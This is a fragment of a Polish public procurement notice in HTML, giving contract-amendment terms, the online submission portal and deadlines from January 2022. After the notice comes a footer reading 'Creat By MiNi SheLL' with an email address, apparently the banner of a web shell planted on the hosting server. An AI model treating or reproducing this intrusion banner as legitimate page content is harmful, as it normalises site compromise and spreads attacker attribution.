Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia opisano w SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Do umów o zamówienie publiczne stosuje się przepisy DZIAŁU VII Pzp - UMOWA W SPRAWIE ZAMÓWIENIA PUBLICZNEGO I JEJ WYKONANIE.<br/>Zamawiający przedstawia projektowane postanowienia umowy w sprawie zamówienia publicznego – jako Załącznik nr 12 do SWZ, w oparciu o który zostanie zawarta umowa. <br/>Złożenie oferty jest jednoznaczne z akceptacją przez wykonawcę projektowanych postanowień umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-14 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi oświadczeniami/dokumentami należy złożyć za pośrednictwem Systemu Zamawiającego pod adresem: https://portal.smartpzp.pl/pcmrzeszow.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-14 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-12</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com